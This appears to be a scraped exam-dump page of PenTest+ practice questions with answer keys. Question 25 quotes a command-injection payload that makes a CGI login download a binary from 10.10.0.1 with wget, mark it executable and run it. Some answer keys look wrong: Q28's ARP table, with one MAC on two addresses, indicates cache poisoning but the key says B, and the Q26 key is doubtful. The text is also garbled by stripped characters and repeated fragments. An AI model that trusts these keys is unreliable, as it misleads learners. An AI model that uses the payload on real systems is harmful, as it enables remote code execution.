QUESTION: 25

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = `POST ` exploit += `/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} `"
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A% 27&loginUser=a&Pwd=a`
exploit += `HTTP/1.1`
Which of the following commands should the penetration tester run post-engagement?

grep "v apache ~/.bash_history > ~/.bash_history
rm "rf /tmp/apache
chmod 600 /tmp/apache
taskkill /IM apache /F

Answer(s): B

Reveal Solution Next Question

QUESTION: 26

Which of the following describe the GREATEST concerns about using third-party open-source libraries in application code? (Choose two.)

The libraries may be vulnerable
The licensing of software is ambiguous
The libraries' code bases could be read by anyone
The provenance of code is unknown
The libraries may be unsupported
The libraries may break the application

Answer(s): A,C

Reference:

https://www.infosecurity-magazine.com/opinions/third-party-libraries-the-swiss/

Reveal Solution Next Question

QUESTION: 27

A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations.
Which of the following are considered passive reconnaissance tools? (Choose two.)

Wireshark
Nessus
Retina
Burp Suite
Shodan
Nikto

Answer(s): A,E

Reference:

https://resources.infosecinstitute.com/topic/top-10-network-recon-tools/

Reveal Solution Next Question

QUESTION: 28

A consultant is reviewing the following output after reports of intermittent connectivity issues:
? (192.168.1.1) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]
? (192.168.1.12) at 34:a4:be:09:44:f4 on en0 ifscope [ethernet]
? (192.168.1.17) at 92:60:29:12:ac:d2 on en0 ifscope [ethernet]
? (192.168.1.34) at 88:de:a9:12:ce:fb on en0 ifscope [ethernet]
? (192.168.1.136) at 0a:d1:fa:b1:01:67 on en0 ifscope [ethernet]
? (192.168.1.255) at ff:ff:ff:ff:ff:ff on en0 ifscope [ethernet]
? (224.0.0.251) at 01:02:5e:7f:ff:fa on en0 ifscope permanent [ethernet]
? (239.255.255.250) at ff:ff:ff:ff:ff:ff on en0 ifscope permanent [ethernet] Which of the following is MOST likely to be reported by the consultant?

A device on the network has an IP address in the wrong subnet.
A multicast session was initiated using the wrong multicast group.
An ARP ooding attack is using the broadcast address to perform DDoS.
A device on the network has poisoned the ARP cache.

Answer(s): B

Reveal Solution Next Question

Free PT1-002 Exam Braindumps (page: 7)

QUESTION: 25

QUESTION: 26

Reference:

QUESTION: 27

Reference:

QUESTION: 28